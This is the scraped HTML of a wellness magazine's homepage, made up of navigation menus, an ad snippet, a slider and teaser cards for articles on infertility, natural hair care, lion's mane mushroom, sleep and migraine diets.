menu-item-14417"><a href=https://www.consciouslifestylemag.com/category/holistic-health/>Health</a><ul class=sub-menu><li id=menu-item-14416 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14416"><a href=https://www.consciouslifestylemag.com/category/healthy-recipes/>Healthy Recipes</a></li><li id=menu-item-14418 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14418"><a href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></li><li id=menu-item-14415 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14415"><a href=https://www.consciouslifestylemag.com/category/ayurveda/>Ayurveda</a></li></ul></li><li id=menu-item-14419 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14419"><a href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><ul class=sub-menu><li id=menu-item-14420 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14420"><a href=https://www.consciouslifestylemag.com/category/humanitarianism/>Humanitarianism</a></li></ul></li><li id=menu-item-14422 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14422 "><a href=https://www.consciouslifestylemag.com/contributors/>Contributors</a></li><li id=menu-item-8208 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8208 "><a href=https://www.consciouslifestylemag.com/contact-us/>Contact Us</a></li><li id=menu-item-8207 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8207 "><a href=https://www.consciouslifestylemag.com/about-us-2/>About Us</a></li><li id=menu-item-6551 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6551 default"><a href=https://www.consciouslifestylemag.com/privacy-policy/>Privacy Policy</a></li><li id=menu-item-14191 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14191 default"><a href=https://www.consciouslifestylemag.com/terms-and-conditions/>Terms</a></li><li id=menu-item-6552 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6552 default"><a href=https://www.consciouslifestylemag.com/advertise/>Advertise</a></li><li id=menu-item-6575 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6575 "><a href=https://www.consciouslifestylemag.com/support/>Support</a></li><li id=menu-item-8086 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8086"><a href=https://www.consciouslifestylemag.com/members/issue-archive/>Issue Archive</a></li><li id=menu-item-8085 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8085"><a href=https://www.consciouslifestylemag.com/members/customer_center/>My Account</a></li></ul></div></nav><nav id=mobile-top-bar-menu class=mobile-nav><span class=selected-option>- Menu -</span><div class=menu-top-bar-menu-container><select id=menu-top-bar-menu-1 class="menu dropdown-menu"><option value class=blank>&#8212; Menu &#8212;</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14399 menu-item-depth-0" value="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&camplink=nav-menu">Subscribe</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15623 menu-item-depth-0" value="https://www.consciouslifestylestore.com?campname=clmstore&camplink=nav-menu">Shop</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14400 menu-item-depth-0" value=https://www.consciouslifestylemag.com/back-issues/>Past Issues</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14402 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/mind/>Mind</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14401 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/mindfulness/>- Mindfulness</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14403 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/meditation/>- Meditation</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14404 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/body/>Body</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14406 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/yoga/>- Yoga</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14405 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/relationships/>- Relationships</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14408 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/spirituality/>Spirit</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14409 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/without-limits/>- Without Limits</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14407 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/consciousness/>- Consciousness</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14411 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/conscious-culture/>Conscious Culture</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14410 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/art/>- Art</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14414 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/music/>- Music</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14412 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/conscious-travel/>- Travel</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14413 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/events/>- Events</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14417 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/holistic-health/>Health</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14416 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/healthy-recipes/>- Healthy Recipes</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14418 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/superfoods/>- Superfoods</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14415 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/ayurveda/>- Ayurveda</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14419 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/eco/>Eco</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14420 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/humanitarianism/>- Humanitarianism</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14422 menu-item-depth-0 " value=https://www.consciouslifestylemag.com/contributors/>Contributors</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8208 menu-item-depth-0 " value=https://www.consciouslifestylemag.com/contact-us/>Contact Us</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8207 menu-item-depth-0 " value=https://www.consciouslifestylemag.com/about-us-2/>About Us</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6551 menu-item-depth-0 default" value=https://www.consciouslifestylemag.com/privacy-policy/>Privacy Policy</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14191 menu-item-depth-0 default" value=https://www.consciouslifestylemag.com/terms-and-conditions/>Terms</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6552 menu-item-depth-0 default" value=https://www.consciouslifestylemag.com/advertise/>Advertise</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6575 menu-item-depth-0 " value=https://www.consciouslifestylemag.com/support/>Support</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8086 menu-item-depth-0" value=https://www.consciouslifestylemag.com/members/issue-archive/>Issue Archive</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8085 menu-item-depth-0" value=https://www.consciouslifestylemag.com/members/customer_center/>My Account</option> </select></div></nav><div id=top-bar-social class="four columns"></div></div></div><div id=container class=boxed-layout><div id=header-section class="logo-left logo-fade clearfix"><div class=container><header class="sixteen columns"><div id=logo class="seven columns alpha"><a href=https://www.consciouslifestylemag.com><img class=standard src=https://www.consciouslifestylemag.com/wp-content/uploads/2017/11/Conscious-Lifestyle-Magazine-Logo-Retina-5-1a.jpg alt><img class=retina src=https://www.consciouslifestylemag.com/wp-content/uploads/2017/11/Conscious-Lifestyle-Magazine-Logo-Retina-5-1a.jpg alt></a></div><div class="header-advert nine columns omega"><div class=textwidget><a href="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&camplink=header-banner"><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2013/11/SubscribeNowBanner3.jpg class=alignright style="margin: 5px 0 9px 20px!important;"></a></div></div></header></div></div><div id=aux-area><div class=container><div id=header-search class="sixteen columns"><form method=get id=header-searchform action=https://www.consciouslifestylemag.com/><input type=text placeholder="Type something and hit enter to search" name=s id=s></form></div></div></div><div id=nav-section class=" clearfix"><div class=container><div class="nav-wrap sixteen columns clearfix"><nav id=main-navigation class="thirteen columns alpha"><div class=menu-main-menu-container><ul id=menu-main-menu class=menu><li id=menu-item-6337 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6337"><a href="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&#038;camplink=nav-menu">Subscribe</a></li><li id=menu-item-14746 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14746"><a href="https://www.consciouslifestylestore.com?campname=clmstore&#038;camplink=nav-menu">Shop</a></li><li id=menu-item-7677 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7677"><a href=https://www.consciouslifestylemag.com/back-issues/>Past Issues</a></li><li id=menu-item-6329 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6329"><a href=https://www.consciouslifestylemag.com/category/mind/>Mind</a><ul class=sub-menu><li id=menu-item-9118 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9118"><a href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a></li><li id=menu-item-9355 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9355"><a href=https://www.consciouslifestylemag.com/category/meditation/>Meditation</a></li></ul></li><li id=menu-item-6324 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6324"><a href=https://www.consciouslifestylemag.com/category/body/>Body</a><ul class=sub-menu><li id=menu-item-9120 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9120"><a href=https://www.consciouslifestylemag.com/category/yoga/>Yoga</a></li><li id=menu-item-10768 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10768"><a href=https://www.consciouslifestylemag.com/category/relationships/>Relationships</a></li></ul></li><li id=menu-item-6331 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6331"><a href=https://www.consciouslifestylemag.com/category/spirituality/>Spirit</a><ul class=sub-menu><li id=menu-item-6336 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6336"><a href=https://www.consciouslifestylemag.com/category/without-limits/>Without Limits</a></li><li id=menu-item-9117 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9117"><a href=https://www.consciouslifestylemag.com/category/consciousness/>Consciousness</a></li></ul></li><li id=menu-item-6335 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6335"><a href=https://www.consciouslifestylemag.com/category/conscious-culture/>Culture</a><ul class=sub-menu><li id=menu-item-6323 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6323"><a href=https://www.consciouslifestylemag.com/category/art/>Art</a></li><li id=menu-item-6330 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6330"><a href=https://www.consciouslifestylemag.com/category/music/>Music</a></li><li id=menu-item-6332 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6332"><a href=https://www.consciouslifestylemag.com/category/conscious-travel/>Travel</a></li><li id=menu-item-6326 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6326"><a href=https://www.consciouslifestylemag.com/category/events/>Events</a></li></ul></li><li id=menu-item-6327 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6327"><a href=https://www.consciouslifestylemag.com/category/holistic-health/>Health</a><ul class=sub-menu><li id=menu-item-8898 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8898"><a href=https://www.consciouslifestylemag.com/category/healthy-recipes/>Healthy Recipes</a></li><li id=menu-item-9119 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9119"><a href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></li><li id=menu-item-9116 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9116"><a href=https://www.consciouslifestylemag.com/category/ayurveda/>Ayurveda</a></li></ul></li><li id=menu-item-6325 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6325"><a href=https://www.consciouslifestylemag.com/category/eco/>Eco</a><ul class=sub-menu><li id=menu-item-6328 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6328"><a href=https://www.consciouslifestylemag.com/category/humanitarianism/>Humanitarianism</a></li></ul></li><li id=menu-item-6553 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6553 "><a href=https://www.consciouslifestylemag.com/contributors/>Contributors</a></li></ul></div></nav><nav id=mobile-navigation class=mobile-nav><span class=selected-option>- Menu -</span><div class=menu-main-menu-container><select id=menu-main-menu-1 class="menu dropdown-menu"><option value class=blank>&#8212; Menu &#8212;</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6337 menu-item-depth-0" value="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&camplink=nav-menu">Subscribe</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14746 menu-item-depth-0" value="https://www.consciouslifestylestore.com?campname=clmstore&camplink=nav-menu">Shop</option><option class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7677 menu-item-depth-0" value=https://www.consciouslifestylemag.com/back-issues/>Past Issues</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6329 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/mind/>Mind</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9118 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/mindfulness/>- Mindfulness</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9355 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/meditation/>- Meditation</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6324 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/body/>Body</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9120 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/yoga/>- Yoga</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10768 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/relationships/>- Relationships</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6331 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/spirituality/>Spirit</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6336 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/without-limits/>- Without Limits</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9117 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/consciousness/>- Consciousness</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6335 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/conscious-culture/>Culture</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6323 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/art/>- Art</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6330 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/music/>- Music</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6332 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/conscious-travel/>- Travel</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6326 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/events/>- Events</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6327 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/holistic-health/>Health</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8898 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/healthy-recipes/>- Healthy Recipes</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9119 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/superfoods/>- Superfoods</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9116 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/ayurveda/>- Ayurveda</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6325 menu-item-depth-0" value=https://www.consciouslifestylemag.com/category/eco/>Eco</option><option class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6328 menu-item-depth-1" value=https://www.consciouslifestylemag.com/category/humanitarianism/>- Humanitarianism</option><option class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6553 menu-item-depth-0 " value=https://www.consciouslifestylemag.com/contributors/>Contributors</option> </select></div></nav><div id=menubar-controls class="three columns omega"><div class=control-item><a id=search-activate href=#><i class=icon-search></i></a><span class="tooltip aux">Search<span class=arrow></span></span></div></div></div></div></div><div id=main-container class=clearfix><div id=ticker-wrap class=clearfix><div class=container><div class="sixteen columns"><ul id=posts-ticker class="news-ticker js-hidden" data-latesttext=Latest:><li class=news-item><a href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/ title="How to Get Pregnant Even When You’ve Tried Everything: The Top 15 Reasons for Unexplained Infertility and What to Do to Fix Them Fast">How to Get Pregnant Even When You’ve Tried Everything: The Top 15 Reasons for Unexplained Infertility and What to Do to Fix Them Fast</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/seed-phytonutrients/ title="Hair Care for People Who Care About the Planet: Organic, Natural Hair Products that Actually Work">Hair Care for People Who Care About the Planet: Organic, Natural Hair Products that Actually Work</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/lions-mane-mushroom/ title="The Miracle Mushroom: The 10 Most Impressive Health Benefits of Lion’s Mane For Brain and Body">The Miracle Mushroom: The 10 Most Impressive Health Benefits of Lion’s Mane For Brain and Body</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/ title="The Body Clock Reset: How to Optimize Your Circadian Rhythm and Get Better Sleep Naturally">The Body Clock Reset: How to Optimize Your Circadian Rhythm and Get Better Sleep Naturally</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/ title="The Migraine Diet: What Foods to Eat and Avoid to Prevent Headaches">The Migraine Diet: What Foods to Eat and Avoid to Prevent Headaches</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/grow-a-new-body/ title="Growing A New Body: How To Completely Restore Your Health And Well-Being At Any Age">Growing A New Body: How To Completely Restore Your Health And Well-Being At Any Age</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/types-of-dreams-and-what-they-mean/ title="Solving the Mystery: The 5 Types of Dreams and What They Mean">Solving the Mystery: The 5 Types of Dreams and What They Mean</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/rythmia-travel-guide-miracle/ title="My Journey to Rythmia Life Advancement Center: The Land of Miracles">My Journey to Rythmia Life Advancement Center: The Land of Miracles</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/spring-2019-issue-out-now/ title="Spring 2019 Issue Out Now">Spring 2019 Issue Out Now</a></li><li class=news-item><a href=https://www.consciouslifestylemag.com/mindful-open-awareness-meditation/ title="The Mindful Open Awareness Meditation: 5 Minutes to a Happier, Calmer You">The Mindful Open Awareness Meditation: 5 Minutes to a Happier, Calmer You</a></li></ul></div></div></div><div class=container><div id=page-wrap class="sixteen columns"><div class="inner-page-wrap has-right-sidebar has-one-sidebar clearfix"><div class="clearfix two-thirds column alpha top-spacing post-8172 page type-page status-publish hentry" id=8172><section class="page-content clearfix"><div class="row-fluid "><div class="wpb_content_element span12 wpb_text_column"><div class="wpb_wrapper clearfix"><div tabindex=0 class="cycloneslider cycloneslider-template-standard cycloneslider-width-responsive" id=cycloneslider-home-page-slideshow-1 style=max-width:620px ><div class="cycloneslider-slides cycle-slideshow" data-cycle-allow-wrap=true data-cycle-dynamic-height=off data-cycle-auto-height=620:280 data-cycle-auto-height-easing=null data-cycle-auto-height-speed=250 data-cycle-delay=0 data-cycle-easing data-cycle-fx=scrollHorz data-cycle-hide-non-active=true data-cycle-log=false data-cycle-next="#cycloneslider-home-page-slideshow-1 .cycloneslider-next" data-cycle-pager="#cycloneslider-home-page-slideshow-1 .cycloneslider-pager" data-cycle-pause-on-hover=true data-cycle-prev="#cycloneslider-home-page-slideshow-1 .cycloneslider-prev" data-cycle-slides="&gt; div" data-cycle-speed=1000 data-cycle-swipe=1 data-cycle-tile-count=7 data-cycle-tile-delay=100 data-cycle-tile-vertical=true data-cycle-timeout=8000 ><div class="cycloneslider-slide cycloneslider-slide-image" data-cycle-fx=scrollHorz > <a class=cycloneslider-caption-more target=_blank href=https://www.consciouslifestylestore.com> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2017/11/Homepage-banner-cls-store-620x280.jpg alt title> </a></div><div class="cycloneslider-slide cycloneslider-slide-image" data-cycle-fx=scrollHorz > <a class=cycloneslider-caption-more href=https://www.consciouslifestylemag.com/healing-meditation-mind-body/> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/09/healing-meditation-banner-2-620x280.jpg alt title> </a></div><div class="cycloneslider-slide cycloneslider-slide-image" data-cycle-fx=scrollHorz > <a class=cycloneslider-caption-more href=https://www.consciouslifestylemag.com/the-six-levels-of-higher-consciousness-how-to-make-the-shift/> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2015/06/Higher-Consciousness-the-six-levels-banner-3-620x280.jpg alt title> </a></div><div class="cycloneslider-slide cycloneslider-slide-image" data-cycle-fx=scrollHorz > <a class=cycloneslider-caption-more href=https://www.consciouslifestylemag.com/meaningful-work-the-eight-keys/> <img src=https://www.consciouslifestylemag.com/wp-content/uploads/2013/12/Meaningful-Work-Banner-620x279-620x280.jpg alt title> </a></div></div> <a href=# class=cycloneslider-prev> <span class=arrow></span> </a> <a href=# class=cycloneslider-next> <span class=arrow></span> </a></div><p></div></div></div><div class="row-fluid "><div class="wpb_content_element span12 wpb_raw_html"><div class=wpb_wrapper> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:block data-ad-client=ca-pub-6657266059429710 data-ad-slot=4694824931 data-ad-format=auto></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </div></div></div><div class=blank_spacer style=height:17px;></div><div class="row-fluid "><div class="wpb_blog_widget wpb_content_element span12"><div class="wpb_wrapper blog-wrap"><ul class="blog-items mini-items clearfix"><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/05/unexplained-infertility-man-woman-stomach-thumbnail-290x193.jpg width=290 height=193 alt="How to Get Pregnant Even When You’ve Tried Everything: The Top 15 Reasons for Unexplained Infertility and What to Do to Fix Them Fast"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a></div><h3><a href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/>How to Get Pregnant Even When You’ve Tried Everything: The Top 15 Reasons for Unexplained Infertility and What to Do to Fix Them Fast</a></h3><div class=blog-item-details>By Conscious Lifestyle on May 1, 2019</div><div class=excerpt>If you have been experiencing unexplained infertility then you fall into one of these 15 categories. Here&#8217;s what to do for each to get pregnant anyway.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/unexplained-infertility-how-to-get-pregnant/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16203 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/seed-phytonutrients/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/04/seed-phytonutrients-thumbnail-290x193.jpg width=290 height=193 alt="Hair Care for People Who Care About the Planet: Organic, Natural Hair Products that Actually Work"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a></div><h3><a href=https://www.consciouslifestylemag.com/seed-phytonutrients/>Hair Care for People Who Care About the Planet: Organic, Natural Hair Products that Actually Work</a></h3><div class=blog-item-details>By Conscious Lifestyle on April 11, 2019</div><div class=excerpt>You want to go natural and organic but most of the time it means sacrificing effectiveness and dull, limp hair. Not anymore. This new line was created to change that.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/seed-phytonutrients/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/seed-phytonutrients/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16537 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>17</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/lions-mane-mushroom/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/lions-mane-mushroom-wild-harvested-basket-thumbnail-290x193.jpg width=290 height=193 alt="The Miracle Mushroom: The 10 Most Impressive Health Benefits of Lion’s Mane For Brain and Body"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#00bf25; href=https://www.consciouslifestylemag.com/category/superfoods/>Superfoods</a></div><h3><a href=https://www.consciouslifestylemag.com/lions-mane-mushroom/>The Miracle Mushroom: The 10 Most Impressive Health Benefits of Lion’s Mane For Brain and Body</a></h3><div class=blog-item-details>By Conscious Lifestyle on April 3, 2019</div><div class=excerpt>From regenerating the brain to improving mood and fighting many diseases, Lion&#8217;s Mane mushroom has a huge spectrum of impressive health benefits. Here are the top 10:</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/lions-mane-mushroom/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/lions-mane-mushroom/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16439 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>10</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/how-to-reset-your-body-clock-schedule-woman-sleeping-light-thumbnail-290x193.jpg width=290 height=193 alt="The Body Clock Reset: How to Optimize Your Circadian Rhythm and Get Better Sleep Naturally"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#6fc8c2; href=https://www.consciouslifestylemag.com/category/mind/>Mind</a></div><h3><a href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/>The Body Clock Reset: How to Optimize Your Circadian Rhythm and Get Better Sleep Naturally</a></h3><div class=blog-item-details>By Conscious Lifestyle on April 1, 2019</div><div class=excerpt>Learn research-backed methods for reseting your body clock and optimizing your sleeping habits for better rest from a world renowned circadian rhythm expert.</div><div class=read-more-bar><a class=read-more href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/>Read more<i class=icon-chevron-right></i></a><div class=comments-likes><a href=https://www.consciouslifestylemag.com/body-clock-reset-optimize-sleep-cycle/#comment-area><i class=icon-comments></i><span>0</span></a><div class=love-it-wrapper><a href=# class=love-it data-post-id=16259 data-user-id=0><i class=icon-heart></i></a> <span class=love-count>23</span></div></div></div></div></li><li class=blog-item><figure><a href=https://www.consciouslifestylemag.com/migraine-diet-foods-to-prevent-headaches/ class=link-to-post><img src=https://www.consciouslifestylemag.com/wp-content/uploads/2019/03/migraine-diet-foods-prevent-headaches-woman-apple-eating-thumbnail-290x193.jpg width=290 height=193 alt="The Migraine Diet: What Foods to Eat and Avoid to Prevent Headaches"></a></figure><div class=blog-details-wrap><div class=item-cats><a class=cat-item style=background-color:#f08e73; href=https://www.consciouslifestylemag.com/category/body/>Body</a><a class=cat-item style=background-color:#6fa5fe; href=https://www.consciouslifestylemag.com/category/holistic-healing/>Holistic Healing</a><a class=cat-item style=background-color:#ffd58a; href=https://www.consciouslifestylemag.com/category/holistic-health/>Holistic Health</a><a class=cat-item style=background-color:#6fc8c2; 